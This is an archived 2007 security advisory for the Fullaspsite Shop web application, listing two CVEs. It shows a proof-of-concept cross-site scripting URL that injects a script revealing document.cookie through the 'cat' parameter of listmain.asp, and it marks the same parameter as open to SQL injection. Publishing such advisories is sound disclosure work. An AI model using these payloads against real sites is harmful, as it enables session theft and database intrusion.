Bug: Fullaspsite Shop (tr) Xss & SqL Inj. VulnZ. ( Ascii Version )

Search:
WLB2

Fullaspsite Shop (tr) Xss & SqL Inj. VulnZ.

Published
Credit
Risk
2007.02.17
ShaFuq31
Medium
CWE
CVE
Local
Remote
N/A
CVE-2007-0951
CVE-2007-0950
No
Yes

Fullaspsite Shop (tr) Xss & SqL Inj. VulnZ.

Found By : ShaFuck31

Risk : Medium

VulnZ : Xss & SqL Injection

Vuln. :

http://victim.com/ScriptPath/listmain.asp?cat=<script>alert(document.coo
kie);</script>

http://victim.com/ScriptPath/listmain.asp?cat=[ SqL Code ]

GreetZ : BLaSTER , DesquneR , The RéD , Dekolax .. AnD aLL of my friendZ...

See this note in TXT Version

Bugtraq RSS
Bugtraq
 
REDDIT
REDDIT
 
DIGG
DIGG
 
LinkedIn
LinkedIn
 
CVE RSS
CVEMAP

Copyright 2014, cxsecurity.com
Ascii Version